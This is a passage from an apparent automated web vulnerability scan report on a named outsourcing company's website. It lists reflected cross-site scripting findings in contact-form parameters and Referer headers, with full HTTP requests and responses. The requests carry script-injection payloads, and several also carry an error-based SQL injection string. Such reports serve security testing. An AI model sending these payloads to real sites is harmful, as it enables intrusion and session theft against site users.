<me
...[SNIP]...
<form id="contactus" method="post" action="/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?2e2d0"><script>alert(1)</script>a4a9133cc3c=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be73"><script>alert(1)</script>aff530c79d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html?6be73"><script>alert(1)</script>aff530c79d5=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:43 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<form id="contactus" method="post" action="/Netsparker86454240ba544e4fbfaa35b725c93778.html?6be73"><script>alert(1)</script>aff530c79d5=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1df26"><script>alert(1)</script>93c674300a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html?1df26"><script>alert(1)</script>93c674300a9=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<form id="contactus" method="post" action="/Netsparkercfe7b9a5d67d488389828738d85656f2.html?1df26"><script>alert(1)</script>93c674300a9=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the 1' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b27e9"><script>alert(1)</script>4d23a1ac00ff75721 was submitted in the 1' parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?1'=1b27e9"><script>alert(1)</script>4d23a1ac00ff75721&p_name=&p_email=&p_company=&p_telephone=&p_validator=&p_message&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html?1'=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?1'=1b27e9"><script>alert(1)</script>4d23a1ac00ff75721&p_name=&p_email=&p_company=&p_telephone=&p_validator=&p_message&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.5. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the 1' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a12"><script>alert(1)</script>f628d40ec93 was submitted in the 1' parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outsourcing-dot-net-development-contact-us.html?1'=197a12"><script>alert(1)</script>f628d40ec93 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=utttqj386ubgf1uorlg7us3l64; path=/
Content-Type: text/html
Content-Length: 7135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?1'=197a12"><script>alert(1)</script>f628d40ec93#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.6. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939df"><script>alert(1)</script>f55c31357e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outsourcing-dot-net-development-contact-us.html?939df"><script>alert(1)</script>f55c31357e0=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?939df"><script>alert(1)</script>f55c31357e0=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_company parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c3e"><script>alert(1)</script>fe3a2ec8b31d79c4 was submitted in the p_company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=320c3e"><script>alert(1)</script>fe3a2ec8b31d79c4&p_telephone=3&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=320c3e"><script>alert(1)</script>fe3a2ec8b31d79c4&p_telephone=3&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d63ec"><script>alert(1)</script>a8ee980eb769c8c5a was submitted in the p_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.comd63ec"><script>alert(1)</script>a8ee980eb769c8c5a&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.comd63ec"><script>alert(1)</script>a8ee980eb769c8c5a&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.9. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_message request parameter is copied into the HTML document as plain text between tags. The payload a76a3<script>alert(1)</script>e567405fb68 was submitted in the p_message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 366

p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3a76a3<script>alert(1)</script>e567405fb68&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:22:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<textarea name="p_message" type="text" cols="40" rows="6" realname="Message" style="border-style:solid;border-width:1px">3a76a3<script>alert(1)</script>e567405fb68</textarea>
...[SNIP]...

2.10. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0cd3"><script>alert(1)</script>321a32c008d855ef2 was submitted in the p_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))d0cd3"><script>alert(1)</script>321a32c008d855ef2&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))d0cd3"><script>alert(1)</script>321a32c008d855ef2&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.11. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_telephone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_telephone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c9b"><script>alert(1)</script>00f44728b6d855ec7 was submitted in the p_telephone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3e7c9b"><script>alert(1)</script>00f44728b6d855ec7&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
5)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3e7c9b"><script>alert(1)</script>00f44728b6d855ec7&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_validator parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_validator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c169"><script>alert(1)</script>c6c36cb51f697a71c was submitted in the p_validator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=32c169"><script>alert(1)</script>c6c36cb51f697a71c&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:22:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=32c169"><script>alert(1)</script>c6c36cb51f697a71c&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

2.13. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 69b75<script>alert(1)</script>614e5863fb0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=69b75<script>alert(1)</script>614e5863fb0

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>614e5863fb0">69b75<script>alert(1)</script>614e5863fb0</a>
...[SNIP]...

2.14. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6094"><script>alert(1)</script>101d74c0fb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=c6094"><script>alert(1)</script>101d74c0fb1

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/.html" title="c6094"><script>alert(1)</script>101d74c0fb1">
...[SNIP]...

2.15. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
